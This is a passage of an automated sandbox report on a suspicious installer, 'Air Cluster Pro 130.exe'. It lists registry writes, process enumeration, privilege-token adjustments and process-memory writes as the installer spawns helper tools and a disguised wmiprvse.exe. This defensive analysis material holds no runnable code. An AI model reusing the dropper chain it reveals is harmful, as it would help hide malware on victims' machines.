Set value (int) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 01000000dff34c8e27ffa3a149b972a8d0f6faab57fa348acbbbfe6264136ab490383e4a07452f52acab0367b7d3bfc7af2e3940921e30ca88a092da7e8a C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\CIPolicyState = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.msn.com C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content\CachePrefix C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListInPrivateBrowsingAllowed = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = bb47bf9fbfb2d901 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Cookies\CacheLimit = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-83S92.tmp\Air Cluster Pro 130.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-83S92.tmp\Air Cluster Pro 130.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
N/A N/A C:\Windows\System32\Conhost.exe N/A
N/A N/A C:\Windows\System32\Conhost.exe N/A
N/A N/A C:\Windows\System32\Conhost.exe N/A
N/A N/A C:\Windows\System32\Conhost.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\bsetgaf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\bsetgaf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\bsetgaf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\bsetgaf.exe N/A
N/A N/A C:\Windows\System32\reg.exe N/A
N/A N/A C:\Windows\System32\reg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
N/A N/A C:\Windows\System32\reg.exe N/A
N/A N/A C:\Windows\System32\reg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\bsetgaf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\bsetgaf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\bsetgaf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\bsetgaf.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\ProgramData\regid.1993-06.com.microsoft\wmiprvse.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL32.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL32.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL32.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL32.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL32.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL32.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Conhost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Conhost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Conhost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\reg.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\reg.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\reg.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL32.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL32.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL32.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\reg.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\reg.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\reg.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
Token: 0 N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Conhost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Conhost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Conhost.exe N/A
Token: 0 N/A C:\Windows\System32\Conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\reg.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\reg.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\reg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\reg.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\reg.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\reg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\reg.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\reg.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\reg.exe N/A
Token: 0 N/A C:\Windows\SysWOW64\reg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\reg.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\reg.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\reg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\reg.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\reg.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\reg.exe N/A
Token: 0 N/A C:\Windows\SysWOW64\reg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\reg.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\reg.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\reg.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
Token: 0 N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4624 wrote to memory of 4220 N/A C:\Users\Admin\AppData\Local\Temp\Air Cluster Pro 130.exe C:\Users\Admin\AppData\Local\Temp\is-83S92.tmp\Air Cluster Pro 130.tmp
PID 4624 wrote to memory of 4220 N/A C:\Users\Admin\AppData\Local\Temp\Air Cluster Pro 130.exe C:\Users\Admin\AppData\Local\Temp\is-83S92.tmp\Air Cluster Pro 130.tmp
PID 4624 wrote to memory of 4220 N/A C:\Users\Admin\AppData\Local\Temp\Air Cluster Pro 130.exe C:\Users\Admin\AppData\Local\Temp\is-83S92.tmp\Air Cluster Pro 130.tmp
PID 4220 wrote to memory of 4372 N/A C:\Users\Admin\AppData\Local\Temp\is-83S92.tmp\Air Cluster Pro 130.tmp C:\Users\Admin\AppData\Local\Temp\is-3MJTR.tmp\setup.exe
PID 4220 wrote to memory of 4372 N/A C:\Users\Admin\AppData\Local\Temp\is-83S92.tmp\Air Cluster Pro 130.tmp C:\Users\Admin\AppData\Local\Temp\is-3MJTR.tmp\setup.exe
PID 4220 wrote to memory of 4372 N/A C:\Users\Admin\AppData\Local\Temp\is-83S92.tmp\Air Cluster Pro 130.tmp C:\Users\Admin\AppData\Local\Temp\is-3MJTR.tmp\setup.exe
PID 4372 wrote to memory of 4204 N/A C:\Users\Admin\AppData\Local\Temp\is-3MJTR.tmp\setup.exe C:\Users\Admin\AppData\Local\Temp\is-VJS8O.tmp\setup.tmp
PID 4372 wrote to memory of 4204 N/A C:\Users\Admin\AppData\Local\Temp\is-3MJTR.tmp\setup.exe C:\Users\Admin\AppData\Local\Temp\is-VJS8O.tmp\setup.tmp
PID 4372 wrote to memory of 4204 N/A C:\Users\Admin\AppData\Local\Temp\is-3MJTR.tmp\setup.exe C:\Users\Admin\AppData\Local\Temp\is-VJS8O.tmp\setup.tmp
PID 4204 wrote to memory of 4192 N/A C:\Users\Admin\AppData\Local\Temp\is-VJS8O.tmp\setup.tmp C:\Users\Admin\AppData\Local\Temp\is-I5072.tmp\s0.exe
PID 4204 wrote to memory of 4192 N/A C:\Users\Admin\AppData\Local\Temp\is-VJS8O.tmp\setup.tmp C:\Users\Admin\AppData\Local\Temp\is-I5072.tmp\s0.exe
PID 4204 wrote to memory of 4192 N/A C:\Users\Admin\AppData\Local\Temp\is-VJS8O.tmp\setup.tmp C:\Users\Admin\AppData\Local\Temp\is-I5072.tmp\s0.exe
PID 4192 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\is-I5072.tmp\s0.exe C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp
PID 4192 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\is-I5072.tmp\s0.exe C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp
PID 4192 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\is-I5072.tmp\s0.exe C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp
PID 1036 wrote to memory of 204 N/A C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp C:\Windows\SysWOW64\cmd.exe
PID 1036 wrote to memory of 204 N/A C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp C:\Windows\SysWOW64\cmd.exe
PID 1036 wrote to memory of 204 N/A C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp C:\Windows\SysWOW64\cmd.exe
PID 204 wrote to memory of 3840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\expand.exe
PID 204 wrote to memory of 3840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\expand.exe
PID 204 wrote to memory of 3840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\expand.exe
PID 1036 wrote to memory of 4536 N/A C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp C:\Windows\SysWOW64\cmd.exe
PID 1036 wrote to memory of 4536 N/A C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp C:\Windows\SysWOW64\cmd.exe
PID 1036 wrote to memory of 4536 N/A C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp C:\Windows\SysWOW64\cmd.exe
PID 4536 wrote to memory of 4816 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4536 wrote to memory of 4816 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4536 wrote to memory of 4816 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1036 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp C:\ProgramData\regid.1993-06.com.microsoft\wmiprvse.exe
PID 1036 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp C:\ProgramData\regid.1993-06.com.microsoft\wmiprvse.exe
PID 1036 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp C:\ProgramData\regid.1993-06.com.microsoft\wmiprvse.exe
PID 1036 wrote to memory of 3688 N/A C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp C:\Windows\SysWOW64\cmd.exe
PID 1036 wrote to memory of 3688 N/A C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp C:\Windows\SysWOW64\cmd.exe
PID 1036 wrote to memory of 3688 N/A C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp C:\Windows\SysWOW64\cmd.exe
PID 812 wrote to memory of 1612 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 812 wrote to memory of 1612 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 812 wrote to memory of 1612 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 812 wrote to memory of 3696 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4204 wrote to memory of 204 N/A C:\Users\Admin\AppData\Local\Temp\is-VJS8O.tmp\setup.tmp C:\Users\Admin\AppData\Local\Temp\is-I5072.tmp\s1.exe
PID 4204 wrote to memory of 204 N/A C:\Users\Admin\AppData\Local\Temp\is-VJS8O.tmp\setup.tmp C:\Users\Admin\AppData\Local\Temp\is-I5072.tmp\s1.exe
PID 4204 wrote to memory of 204 N/A C:\Users\Admin\AppData\Local\Temp\is-VJS8O.tmp\setup.tmp C:\Users\Admin\AppData\Local\Temp\is-I5072.tmp\s1.exe
PID 812 wrote to memory of 3696 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 812 wrote to memory of 3696 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 812 wrote to memory of 3696 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 812 wrote to memory of 3696 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 812 wrote to memory of 3696 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 204 wrote to memory of 4200 N/A C:\Users\Admin\AppData\Local\Temp\is-I5072.tmp\s1.exe C:\Windows\SysWOW64\cmd.exe
PID 204 wrote to memory of 4200 N/A C:\Users\Admin\AppData\Local\Temp\is-I5072.tmp\s1.exe C:\Windows\SysWOW64\cmd.exe
PID 204 wrote to memory of 4200 N/A C:\Users\Admin\AppData\Local\Temp\is-I5072.tmp\s1.exe C:\Windows\SysWOW64\cmd.exe
PID 812 wrote to memory of 3696 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 812 wrote to memory of 3696 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 812 wrote to memory of 3696 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4200 wrote to memory of 3228 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL32.exe
PID 4200 wrote to memory of 3228 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL32.exe
PID 4200 wrote to memory of 3228 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL32.exe
PID 4200 wrote to memory of 5088 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\svchost.exe
PID 4200 wrote to memory of 5088 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\svchost.exe
PID 4200 wrote to memory of 5088 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\svchost.exe
PID 4200 wrote to memory of 3100 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe
PID 4200 wrote to memory of 3100 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe
